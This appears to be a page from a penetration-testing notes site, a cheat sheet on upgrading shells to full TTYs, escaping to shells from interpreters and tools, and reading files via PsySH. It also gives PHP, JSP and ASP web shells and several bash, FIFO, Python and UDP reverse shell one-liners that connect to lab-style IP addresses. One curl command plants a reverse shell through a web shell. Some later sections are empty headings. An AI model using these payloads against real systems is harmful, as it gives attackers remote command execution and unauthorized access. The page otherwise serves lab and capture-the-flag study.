Page cover
Edit

Shells/TTYs

and Shells

Teletypewriters

Get a Full TTY

BASH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Change the env to xterm
export TERM=xterm

Terminal Size

Check your terminal size
stty size
Now, change it in the target
stty rows <NUMBER> columns <NUMBER>

Use arrow-keys

Just use it
bash
Turn history on
set -o history

  • In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example
rlwrap nc -lvnp <port>
Connection example
rlwrap nc 10.10.10.131 6200
Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")'

The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

Also is possible to use echo to pass Python os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash')

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'
Spawn the shell directly
perl: exec "/bin/sh";

Ruby's exec function, like in Perl, replaces the current process with a new process—in this case, /bin/sh:

ruby: exec "/bin/sh"

Runs a shell command from Lua, but unlike in Perl or Ruby, this does not replace the current process. It runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

Used to execute an external shell command:

:!bash

Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

Print the working directory
getcwd()
Print the current user
get_current_user()
Print system info
phpinfo()
Print contents from directory
scandir("/home")
Print content from file
file_get_contents("/etc/os-release")
Web Shells
PHP Shell
<?php system($_REQUEST['cmd']); ?>
Create a web shell file
echo '<?php system($_REQUEST['cmd']); ?>' > cmd.php
JSP - Java Server Pages
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP - Active Server Pages
<% eval request("cmd") %>
BASH Reverse Shells
Standard
bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
URL
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
URL Encoded
rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f
Run it in the background
nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &
Python Reverse Shells

PTY

One-liner IPv4
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Save in a file IPv4
echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

subprocess

One-liner IPv4 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Save it in a file IPv4
echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py
Can also use curl
curl http://SITE.com/shell.php --data-urlencode "cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
UDP Reverse shell
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()
PHP Reverse shell
Powershell Reverse shell
Node-Red Reverse shell

  • Once you received the connection use another listener you get a more stable shell:

  • Then use script:

Bind Shells

  • First, find ports were inbound connections are allowed:

Check the firewall rules in Windows:

PreviousMetadata RemovalNextWordlists

Last updated